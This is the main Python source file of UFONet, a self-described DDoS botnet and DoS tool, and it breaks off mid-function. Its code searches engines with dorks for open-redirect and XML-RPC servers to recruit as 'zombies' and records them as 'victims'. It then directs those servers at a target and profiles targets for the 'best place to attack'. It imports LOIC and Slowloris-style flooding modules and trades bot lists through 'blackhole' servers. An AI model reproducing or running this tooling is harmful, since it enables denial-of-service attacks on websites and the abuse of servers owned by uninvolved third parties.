#!/usr/bin/env python # -*- coding: utf-8 -*-" """ UFONet - (DDoS botnet + DoS tool) via Web Abuse - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net) You should have received a copy of the GNU General Public License along with UFONet; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import os, sys, re, traceback, random, time, threading, base64, socket, httplib, ssl, string import StringIO, urllib, urllib2, cgi, json from urlparse import urlparse from random import randrange, shuffle from options import UFONetOptions from update import Updater from herd import Herd from zombie import Zombie from doll import Doll from inspector import Inspector from abductor import Abductor from loic import LOIC from loris import LORIS DEBUG = 0 class UFONet(object): def __init__(self): self.blackhole = '' # default download/upload zombies 'blackhole' self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve 'zombies' self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve 'aliens' self.droids_file = 'botnet/droids.txt' # set source path to retrieve 'droids' self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs' self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs' self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans' self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve 'dorks' self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats self.referer = '' self.head = False self.payload = False self.external = False self.attack_mode = False self.retries = '' self.delay = '' self.connection_failed = False self.total_possible_zombies = 0 self.herd = Herd(self) self.sem = False self.port = "8080" # default UFONet injection port self.db_flash = 0 # db stress counter self.total_aliens = 0 self.aliens_hit = 0 self.aliens_fail = 0 self.total_droids = 0 self.droids_hit = 0 self.droids_fail = 0 self.total_ucavs = 0 self.ucavs_hit = 0 self.ucavs_fail = 0 self.total_rpcs = 0 self.rpcs_hit = 0 self.rpcs_fail = 0 self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic) self.ctx.check_hostname = False self.ctx.verify_mode = ssl.CERT_NONE self.nat_error_flag = "OFF" self.trans_zombies = 0 self.scanned_zombies = 0 def create_options(self, args=None): self.optionParser = UFONetOptions() self.options = self.optionParser.get_options(args) if not self.options: return False return self.options def banner_welcome(self): print " 0===============================================0" print " '' '----' '' || ||" print " .'_.- ( ) -._'. || * Botnet -> DDoS: ||" print " .'.' |'..'| '.'. || ||" print " .-. .' /'--.__|____|__.--'\ '. .-. || -Zombies : HTTP GET bots ||" print " (O).)-| | \ * | |* / | |-(.(O) || -Droids : HTTP GET (+params) bots ||" print " `-' '-'-._'-./ \.-'_.-'-' `-' || -Aliens : HTTP POST bots ||" print " _ | | '-.________.-' | | _ || -UCAVs : Web Abusing bots ||" print " .' _ | | | __ | | | _ '. || -X-RPCs : XML-RPC bots ||" print " / .' ''.| | /____\ | |.'' '. \ || ||" print " | |( )| '. ||_____ || .' |( )| | || * Close Combat -> DoS: ||" print " \ '._.' '. | \____/ | .' '._.' / || ||" print " '.__ ______'.|__'--'__|.'______ __.' || -LOIC : Fast HTTP requests ||" print " .'_.-| |-._'. || -LORIS : Slow HTTP requests ||" print " || ||" print " * Class: UFONet - ViPR404 (model B)- || * Featured: Crawler, +CVE, +WAF detection ||" print " * Type: /Scout/Transporter/Warfare/ || ||" print " 0|=============================================|0" print "" def banner(self): print '='*75, "\n" print "888 888 8888888888 .d88888b. 888b 888 888 " print "888 888 888 d88P Y888b 8888b 888 888 " print "888 888 888 888 888 88888b 888 888 " print "888 888 8888888 888 888 888Y88b 888 .d88b. 888888 " print "888 888 888 888 888 888 Y88b888 d8P Y8b 888 " print "888 888 888 888 888 888 Y88888 88888888 888 " print "Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. " print " 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888" print self.optionParser.description, "\n" print '='*75 def try_running(self, func, error, args=None): options = self.options args = args or [] try: return func(*args) except Exception as e: print(error, "error") if DEBUG: traceback.print_exc() def start_ship_engine(self): self.agents = [] # generating available user-agents f = open(self.agents_file) agents = f.readlines() f.close() for agent in agents: self.agents.append(agent) self.user_agent = random.choice(self.agents).strip() self.search_engines = [] # available dorking search engines self.search_engines.append('bing') # [03/02/2018: OK!] self.search_engines.append('yahoo') # [03/02/2018: OK!] #self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound] #self.search_engines.append('duck') [09/08/2016: deprecated! -> duck has removed 'inurl' operator] #self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR] if not os.path.exists("core/json/"): # create gui json cfg files folder os.mkdir("core/json/") self.banner_welcome() self.update_flying_stats() # update flying time stats chargo = self.check_mothership_chargo() # check mothership chargo self.update_max_chargo(int(chargo)) # update max chargo stats def run(self, opts=None): if opts: self.create_options(opts) options = self.options # start threads if not self.options.threads: self.options.threads=5 # default number of threads self.sem = threading.Semaphore(self.options.threads) # start ship engine self.start_ship_engine() # check proxy options proxy = options.proxy if options.proxy: try: pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]' m = re.search(pattern, proxy) if m is None: self.banner() print ("\n[Error] - Proxy malformed!\n") return #sys.exit(2) except Exception: self.banner() print ("\n[Error] - Proxy malformed!\n") return #sys.exit(2) # check tor connection if options.checktor: url = 'https://check.torproject.org' # TOR status checking site self.banner() print "\nSending request to: " + url + "\n" self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer try: if options.proxy: # set proxy self.proxy_transport(options.proxy) req = urllib2.Request(url, None, headers) tor_reply = urllib2.urlopen(req).read() else: req = urllib2.Request(url, None, headers) tor_reply = urllib2.urlopen(req, context=self.ctx).read() your_ip = tor_reply.split('')[1].split('')[0].strip() # extract public IP if not tor_reply or 'Congratulations' not in tor_reply: print("It seems that Tor is not properly set.\n") print("Your IP address appears to be: " + your_ip + "\n") else: print("Congratulations!. Tor is properly being used :-)\n") print("Your IP address appears to be: " + your_ip + "\n") except: print("Cannot reach TOR checker system!. Are you correctly connected?\n") sys.exit(2) # return # run AES256+HMAC-SHA1 enc/dec tool if options.cryptomsg: from server.crypter import Cipher from base64 import b64encode, b64decode print " " print " ____...------------...____ " print " _.-'' /o/__ ____ __ __ __ \o\_`'-._ " print " .' / / \ \ '. " print " |=====/o/======================\o\=====| " print " |____/_/________..____..________\_\____| " print " / _/ \_ <_o#\__/#o_> _/ \_ \ " print " \__/_____\####/__________/####/_____\__/ " print " |===\!/========================\!/===| " print " | |=| .---. |=| | " print " |===|o|=========/ \========|o|===| " print " | | | \() ()/ | | | " print " |===|o|======{'-.) A (.-'}=====|o|===| " print " | __/ \__ '-.\uuu/.-' __/ \__ | " print " |==== .'.'^'.'.====|====.'.'^'.'.====| " print " | _\o/ __ {.' __ '.} _ _\o/ _| " print " '''''''''''''''''''''''''''''''''''''' " print "\nUFONet Crypter (AES256+HMAC-SHA1)\n" print " -> (140 plain text chars = 69 encrypted chars)\n" text = str(raw_input("- Enter text: ")) input_key = str(raw_input("- Enter key: ")) key = b64encode(input_key) c = Cipher(key, text) msg = c.encrypt() c.set_text(msg) print '\n-> Ciphertext: [', msg, ']' print '\nLength:', len(msg) print '\n-> Key (share it using SNEAKNET!):', input_key print '\nDecryption PoC:', c.decrypt(), "\n" # search for 'zombies' on search engines results (dorking) if options.search: zombies = [] if options.engine: engine = options.engine else: engine = "yahoo" # default search engine try: self.banner() if not os.path.exists(self.humans_file) == True: f = open(self.humans_file, 'w') f.close() lf = open(self.humans_file, 'r') restored = lf.readlines() zombies_restored = len(restored) lf.close() lz = open(self.zombies_file, 'r') zombies_army = lz.readlines() for zombie in zombies_army: zombies.append(zombie) # add zombies from army to the zombies pool lz.close() if len(restored) > 0: print "\n[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n" if not self.options.forceyes: backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n") print '-'*25 else: backup_reply = "Y" if backup_reply == "n" or backup_reply == "N": print "\n[Info] Removing data stored and starting a new search...\n" os.remove(self.humans_file) zombies_restored = 0 # flush zombies restored print '-'*25 + "\n" else: print "\n[Info] Restoring data and starting a new search...\n" print '-'*25 + "\n" for zombie in restored: zombies.append(zombie) # add previous data to zombies pool if options.allengines: for e in self.search_engines: engine = e print '='*44 print("\nSearching for zombies (with AI mode) using: "+engine+'\n') print '='*44 + '\n' self.options.engine = engine try: zombies_chain = self.search_zombies(dork='', zombies_found=zombies) if zombies_chain != None: for zombie in zombies_chain: if zombie not in zombies: # evade possible repetitions zombies.append(zombie) except: if zombies: # backup all new zombies found to file in case of exception for zombie in zombies: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) else: if restored: print '='*44 print("\nSearching for zombies (with AI mode) using: "+engine+"\n") print '='*44 + '\n' if restored: # from restored file try: zombies_chain = self.search_zombies(dork='', zombies_found=zombies) if zombies_chain != None: for zombie in zombies_chain: if zombie not in zombies: # evade possible repetitions zombies.append(zombie) except: if zombies: # backup all new zombies found to file in case of exception for zombie in zombies: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) else: try: zombies = self.search_zombies(dork='', zombies_found=zombies) except: if zombies: # backup all new zombies found to file in case of exception for zombie in zombies: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) total_restored = zombies_restored new_zombies = 0 # new zombies counter f = open(self.zombies_file, 'r') zz = f.readlines() f.close() zombies_found = [] for z in zombies: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz and z+os.linesep not in zz: new_zombies = new_zombies + 1 zombies_found.append(z) print '='*62 print "\n- Victims found:", len(zombies_found), "\n" print " - Restored:", total_restored print " - Dorked:", len(zombies_found) - total_restored, "\n" print '-'*32 print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n" print '='*62 + '\n' if len(zombies) > 0: if not self.options.forceyes: check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n") print '-'*25 else: check_backup_reply = "Y" if check_backup_reply == "n" or check_backup_reply == "N": if os.path.isfile(self.humans_file): os.remove(self.humans_file) # remove search backup file (keeping love from shadows!) print "\n[Info] Temporal data correctly removed...\n" else: with open(self.humans_file, "w") as f: for z in zombies_found: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz or z+os.linesep not in zz: f.write(z+os.linesep) f.close() print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n" print '-'*25 + "\n" if new_zombies and new_zombies > 0: if not self.options.forceyes: check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n") print '-'*25 + "\n" else: check_url_link_reply = "Y" if check_url_link_reply == "n" or check_url_link_reply == "N": print "Bye!\n" pass else: print "\n" + '='*44 test = self.testing(zombies_found) else: print "[Info] NOT any NEW possible zombies found... Exiting!\n" except Exception: print ("\n[Error] - Something wrong searching using: "+engine+"\n") # search for 'zombies' from a list of 'dorks' if options.dorks: if options.engine: engine = options.engine else: engine = "yahoo" # default search engine try: dorks = self.extract_dorks() if not dorks: return zombies = [] self.banner() if not os.path.exists(self.humans_file) == True: f = open(self.humans_file, 'w') f.close() lf = open(self.humans_file, 'r') restored = lf.readlines() zombies_restored = len(restored) lf.close() lz = open(self.zombies_file, 'r') zombies_army = lz.readlines() for zombie in zombies_army: zombies.append(zombie) # add zombies from army to the zombies pool lz.close() if len(restored) > 0: print "\n[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n" if not self.options.forceyes: backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n") print '-'*25 else: backup_reply = "Y" if backup_reply == "n" or backup_reply == "N": print "\n[Info] Removing data stored and starting a new search...\n" os.remove(self.humans_file) zombies_restored = 0 # flush zombies restored print '-'*25 + "\n" else: print "\n[Info] Restoring data and starting a new search...\n" print '-'*25 + "\n" for zombie in restored: zombies.append(zombie) # add previous data to zombies pool total_restored = zombies_restored if options.allengines: for e in self.search_engines: engine = e print '='*44 print("\nSearching for zombies (with AI mode) using: "+engine+ " [from a list of 'dorks']\n") print '='*44 + '\n' self.options.engine = engine for dork in dorks: print '='*22 print "Dork:", dork print '='*22 + '\n' try: dorked_zombies = self.search_zombies(dork, zombies) # AI mode for zombie in dorked_zombies: if zombie not in zombies: # evade repetitions for zombies found zombies.append(zombie) if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) f.close() except: if zombies: # backup new zombies found on exception for zombie in zombies: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) f.close() else: if restored: print '='*44 print("\nSearching for zombies (with AI mode) using: "+engine+ " [from a list of 'dorks']\n") print '='*44 + '\n' for dork in dorks: print '='*22 print "Dork:", dork print '='*22 + '\n' try: dorked_zombies = self.search_zombies(dork, zombies) # AI mode if dorked_zombies != None: for zombie in dorked_zombies: if zombie not in zombies: # evade repetitions for zombies found zombies.append(zombie) except: if zombies: # backup new zombies found on exception for zombie in zombies: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) f.close() new_zombies = 0 # new zombies counter f = open(self.zombies_file, 'r') zz = f.readlines() f.close() zombies_found = [] for z in zombies: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz and z+os.linesep not in zz: new_zombies = new_zombies + 1 zombies_found.append(z) print '='*62 print "\n- Victims found:", len(zombies_found), "\n" print " - Restored:", total_restored print " - Dorked:", len(zombies_found) - total_restored, "\n" print '-'*32 print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n" print '='*62 + '\n' if len(zombies_found) > 0: if not self.options.forceyes: check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n") print '-'*25 else: check_backup_reply = "Y" if check_backup_reply == "n" or check_backup_reply == "N": if os.path.isfile(self.humans_file): os.remove(self.humans_file) # remove search backup file (keeping love from shadows!) print "\n[Info] Temporal data correctly removed...\n" else: with open(self.humans_file, "w") as f: for z in zombies_found: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz or z+os.linesep not in zz: f.write(z+os.linesep) f.close() print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n" print '-'*25 + "\n" if new_zombies and new_zombies > 0: if not self.options.forceyes: check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n") print '-'*25 + "\n" else: check_url_link_reply = "Y" if check_url_link_reply == "n" or check_url_link_reply == "N": print "Bye!\n" pass else: print "\n" + '='*44 test = self.testing(zombies_found) else: print "[Info] NOT any NEW possible zombies found... Exiting!\n" except Exception: print ("\n[Error] - Something wrong searching using: "+engine+"\n") # auto-search for 'zombies' (dorks+all_engines+time -> to discover max new zombies) if options.autosearch: try: dorks = self.extract_dorks() except: print "\n[Info] Not any dork present at: 'botnet/dorks.txt'. Aborting!\n" return engines_list = self.search_engines stop_flag = False # use a flag to establish an end try: self.banner() print "\nSearching automatically for 'zombies' (WARNING: this may take several time!)\n" print "[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n" print '-'*25 + "\n" zombies_found = [] lz = open(self.zombies_file, 'r') zombies_army = lz.readlines() for zombie in zombies_army: zombies_found.append(zombie) # add zombies from army to the zombies found pool lz.close() if not os.path.exists(self.humans_file) == True: f = open(self.humans_file, 'w') f.close() lf = open(self.humans_file, 'r') restored = lf.readlines() zombies_restored = len(restored) lf.close() if len(restored) > 0: print "[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n" if not self.options.forceyes: backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n") print '-'*25 else: backup_reply = "Y" if backup_reply == "n" or backup_reply == "N": print "\n[Info] Removing data stored and starting a new (auto)search...\n" os.remove(self.humans_file) zombies_restored = 0 # flush zombies restored print '-'*25 + "\n" else: print "\n[Info] Restoring data and starting a new (auto)search...\n" print '-'*25 + "\n" for zombie in restored: zombies_found.append(zombie) # add previous data to zombies found pool total_restored = zombies_restored while stop_flag == False: if not os.path.exists(self.humans_file) == True: f = open(self.humans_file, 'w') f.close() lf = open(self.humans_file, 'r') # read it on each iteration to update changes restored = lf.readlines() lf.close() zombies_restored = len(restored) for e in engines_list: zombies_counter = 0 # use it also as (engine) flag engine = e self.options.engine = engine print '='*44 + '\n' print("Searching for zombies (with AI mode) using: "+engine+'\n') print '='*44 + '\n' for dork in dorks: print '='*22 print "Dork:", dork print '='*22 + '\n' try: dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode for zombie in dorked_zombies: if zombie not in zombies_found: # evade repetitions for zombies found zombies_found.append(zombie) if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) f.close() zombies_counter = zombies_counter + 1 except: if zombies_found: # backup new zombies found on exception for zombie in zombies_found: if zombie+os.linesep not in restored: # only append new zombies found with open(self.humans_file, "a") as f: f.write(str(zombie+os.linesep)) f.close() if zombies_counter == 0: print "[Info] - NOT more NEW victims found (by the moment) using: "+engine+"... Let's remove it from queue!\n" print '-'*25 + "\n" engines_list.remove(engine) # remove not more results engine from search engines list if not engines_list: # if search engines empty, call return-exit routine print "[Info] - Search engines aren't providing more results... Exiting! ;-)\n" print '-'*25 + "\n" stop_flag = True # exit flag up new_zombies = 0 # new zombies counter f = open(self.zombies_file, 'r') zz = f.readlines() f.close() all_zombies_found = [] for z in zombies_found: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz and z+os.linesep not in zz: new_zombies = new_zombies + 1 all_zombies_found.append(z) print '='*62 print "\n- Victims found:", len(all_zombies_found), "\n" print " - Restored:", total_restored print " - Dorked:", len(all_zombies_found) - total_restored, "\n" print '-'*32 print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n" print '='*62 + '\n' if len(zombies_found) > 0: if not self.options.forceyes: check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n") print '-'*25 else: check_backup_reply = "Y" if check_backup_reply == "n" or check_backup_reply == "N": if os.path.isfile(self.humans_file): os.remove(self.humans_file) # remove search backup file (keeping love from shadows!) print "\n[Info] Temporal data correctly removed...\n" else: with open(self.humans_file, "w") as f: for z in all_zombies_found: if z.endswith(os.linesep): z = z.replace(os.linesep, "") if z not in zz or z+os.linesep not in zz: f.write(z+os.linesep) f.close() print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n" print '-'*25 + "\n" if new_zombies and new_zombies > 0: if not self.options.forceyes: check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n") print '-'*25 + "\n" else: check_url_link_reply = "Y" if check_url_link_reply == "n" or check_url_link_reply == "N": print "Bye!\n" pass else: print "\n" + '='*44 test = self.testing(all_zombies_found) else: print "[Info] NOT any NEW possible zombies found... Exiting!\n" except Exception: print ("[Error] - Something wrong (auto)searching...\n") # test web 'zombie' servers -> show statistics if options.test: try: self.banner() zombies = self.extract_zombies() if not zombies: return test = self.testing(zombies) self.update_missions_stats() # update mothership missions stats except Exception: print ("\n[Error] - Something wrong testing!\n") traceback.print_exc() # test XML-'rpc' pingback vulnerable servers -> update list if options.testrpc: try: self.banner() rpcs = self.extract_rpcs() if not rpcs: return testrpc = self.testing_rpcs(rpcs) self.update_missions_stats() # update mothership missions stats except Exception: print ("\n[Error] - Something wrong testing XML-RPC servers!\n") traceback.print_exc() # check botnet searching for zombies offline if options.testoffline: try: self.banner() testbotnet = self.testing_offline() self.update_missions_stats() # update mothership missions stats except Exception: print ("\n[Error] - Something wrong checking for offline 'zombies'!\n") traceback.print_exc() # check ALL botnet status if options.testall: try: self.banner() test_all_botnet = self.testing_all() self.update_missions_stats() # update mothership missions stats except Exception: print ("\n[Error] - Something wrong testing ALL botnet status!\n") traceback.print_exc() # attack target -> exploit Open Redirect massively and conduct vulnerable servers to a target if options.target: try: self.banner() zombies = self.extract_zombies() if not zombies: return attack = self.attacking(zombies) self.update_missions_stats() # update mothership missions stats except Exception: print ("\n[Error] - Something wrong attacking!\n") traceback.print_exc() # inspect target -> inspect target's components sizes if options.inspect: try: self.banner() print("\nInspecting target to find the best place to attack... SSssh!\n") print '='*22 + '\n' self.instance = Inspector(self) # instance main class for inspection operations inspection = self.instance.inspecting(options.inspect) self.update_missions_stats() # update mothership missions stats except Exception, e: traceback.print_exc() print ("\n[Error] - Something wrong inspecting... Not any object found!\n") return #sys.exit(2) # abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.) if options.abduction: try: self.banner() print("\nAbducting target to extract interesting information... Be patient!\n") print '='*22 + '\n' self.instance = Abductor(self) # instance main class for abduction operations abduction = self.instance.abducting(options.abduction) self.update_missions_stats() # update mothership missions stats except Exception, e: traceback.print_exc() print ("\n[Error] - Something wrong abducting... Not any data stream found!\n") return #sys.exit(2) # attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking if options.attackme: try: self.banner() print("\nOrdering 'zombies' to attack you for benchmarking ;-)\n") print("[Warning] You are going to reveal your real IP to your zombies...\n") if not self.options.forceyes: update_reply = raw_input("Want to continue? (Y/n)") else: update_reply = "Y" if update_reply == "n" or update_reply == "N": print "\n[Info] Aborting 'Attack-Me' test... Bye!\n" return self.mothership_ids = [] # generating name/id for your mothership ;-) f = open(self.motherships_file) motherships = f.readlines() f.close() for ship in motherships: self.mothership_ids.append(base64.urlsafe_b64encode(ship)) self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip())) self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash print "\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash f = open("alien", "w") # generate random alien worker f.write(str(self.mothership_hash)) f.close() print("\nChecking NAT/IP configuration:\n") nat = self.check_nat() if self.nat_error_flag == "ON": return zombies = self.extract_zombies() if not zombies: return attackme = self.attackme(zombies) self.update_missions_stats() # update mothership missions stats except Exception, e: traceback.print_exc() print ("\n[Error] - Something wrong redirecting 'zombies' against you...\n") return #sys.exit(2) # # crawl target -> crawl target's places # if options.crawl: # try: # self.banner() # print("\nCrawlering target's links to discover web structure...\n") # print '='*22 + '\n' # crawler = self.crawlering() # except Exception, e: # print ("[Error] - Something wrong crawlering!\n") # return #sys.exit(2) # check/update for latest stable version if options.update: self.banner() try: print("\nTrying to update automatically to the latest stable version\n") Updater() except: print("\nSomething was wrong!. To have working this feature, you should clone UFONet with:\n") print("$ git clone https://github.com/epsylon/ufonet\n") # launch GUI/Web interface if options.web: self.create_web_interface() return # generate 'blackhole' server to share 'zombies' if options.blackhole is not None: self.banner() try: blackhole_lib = os.path.abspath(os.path.join('..', 'server')) # add 'blackhole' lib sys.path.append(blackhole_lib) from server.blackhole import BlackHole print("\nInitiating void generation sequence...\n") print '='*22 + '\n' app = BlackHole() app.start() while True: time.sleep(1) except KeyboardInterrupt: print("\nTerminating void generation sequence...\n") app.collapse() except Exception, e: print "[Error] "+str(e) print("\nSomething was wrong generating 'blackhole'. Aborting...\n") # download list of 'zombies' from a 'blackhole' IP if options.dip is not None: options.download = True self.blackhole = options.dip # download list of 'zombies' from server if options.download: try: self.banner() if options.dip is not None: print("\nDownloading list of 'zombies' from server "+self.blackhole+" ...\n") else: print("\nDownloading list of 'zombies' from server ...\n") print '='*22 + '\n' download_list = self.downloading_list() except Exception, e: print ("[Error] - Something wrong downloading!\n") return #sys.exit(2) # upload list of 'zombies' to a 'blackhole' IP if options.upip is not None: options.upload = True self.blackhole = options.upip # upload list of 'zombies' to server if options.upload: try: self.banner() if options.upip is not None: print("\nUploading list of 'zombies' to server "+self.blackhole+" ...\n") else: print("\nUploading list of 'zombies' to server ...\n") print '='*22 + '\n' upload_list = self.uploading_list() except Exception, e: print ("[Error] - Something wrong uploading!\n"+str(e)) traceback.print_exc() return #sys.exit(2) # starting new zombie thread def connect_zombies(self, zombie): z=Zombie(self, zombie) t = threading.Thread(target=z.connect, name=zombie) t.start() # single connection handling def connect_zombie(self, zombie): z=Zombie(self,zombie) return z.connect() def extract_proxy(self, proxy): sep = ":" proxy_ip = proxy.rsplit(sep, 1)[0] if proxy_ip.startswith('http://'): proxy_ip = proxy_ip.replace('http://', '') elif proxy_ip.startswith('https://'): proxy_ip = proxy_ip.replace('https://', '') if proxy_ip == '': # working by using 'localhost' as http proxy (privoxy, ...) proxy_ip = 'localhost' proxy_port = proxy.rsplit(sep, 1)[1] proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118 return proxy_url def proxy_transport(self, proxy): proxy_url = self.extract_proxy(proxy) proxy = urllib2.ProxyHandler({'https': proxy_url}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) def check_mothership_chargo(self): f = open(self.zombies_file) self.zombies = f.readlines() self.zombies = [zombie.replace('\n', '') for zombie in self.zombies] self.list_zombies = [] for zombie in self.zombies: t = urlparse(zombie) name_zombie = t.netloc self.list_zombies.append(name_zombie) self.num_zombies = str(len(self.zombies)) f.close() f = open(self.aliens_file) self.aliens = f.readlines() self.aliens = [alien.replace('\n', '') for alien in self.aliens] self.list_aliens = [] for alien in self.aliens: t = urlparse(alien) name_alien = t.netloc self.list_aliens.append(name_alien) self.num_aliens = str(len(self.aliens)) f.close() f = open(self.droids_file) self.droids = f.readlines() self.droids = [droid.replace('\n', '') for droid in self.droids] self.list_droids = [] for droid in self.droids: t = urlparse(droid) name_droid = t.netloc self.list_droids.append(name_droid) self.num_droids = str(len(self.droids)) f.close() f = open(self.ucavs_file) self.ucavs = f.readlines() self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs] self.list_ucavs = [] for ucav in self.ucavs: t = urlparse(ucav) name_ucav = t.netloc self.list_ucavs.append(name_ucav) self.num_ucavs = str(len(self.ucavs)) f.close() f = open(self.rpcs_file) self.rpcs = f.readlines() self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs] self.list_rpcs = [] for rpc in self.rpcs: t = urlparse(rpc) name_rpc = t.netloc self.list_rpcs.append(name_rpc) self.num_rpcs = str(len(self.rpcs)) f.close() self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs)) return self.total_botnet def update_flying_stats(self): if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used) with open(self.mothership_stats_file, "w") as f: json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "crashed": "0"}, f, indent=4) # starting reset stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() aflying = data["flying"] aflying = str(int(aflying) + 1) # add new flying time data["flying"] = aflying stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_mothership_stats(self): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() acompleted = data["completed"] acompleted = str(int(acompleted) + 1) # add new completed attack data["completed"] = acompleted stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_targets_crashed(self): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() tcrashed = data["crashed"] tcrashed = str(int(tcrashed) + 1) # add new crashed target data["crashed"] = tcrashed stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_missions_stats(self): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() missions = data["missions"] missions = str(int(missions) + 1) # add new mission target data["missions"] = missions stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_scanner_stats(self, num): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() scanner = data["scanner"] scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats data["scanner"] = scanner stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_transferred_stats(self, num): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() transferred = data["transferred"] transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats data["transferred"] = transferred stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_max_chargo(self, chargo): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() amax_chargo = data["max_chargo"] if int(chargo) > int(amax_chargo): # new max chargo found amax_chargo = chargo # add new max chargo else: amax_chargo = data["max_chargo"] data["max_chargo"] = amax_chargo stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_loic_stats(self): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() aloic = data["loic"] aloic = str(int(aloic) + 1) # add new loic attack data["loic"] = aloic stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def update_loris_stats(self): stats_json_file = open(self.mothership_stats_file, "r") data = json.load(stats_json_file) stats_json_file.close() aloris = data["loris"] aloris = str(int(aloris) + 1) # add new loris attack data["loris"] = aloris stats_json_file = open(self.mothership_stats_file, "w+") stats_json_file.write(json.dumps(data)) stats_json_file.close() def uploading_list(self): import gzip abductions = "abductions.txt.gz" troops = "troops.txt.gz" robots = 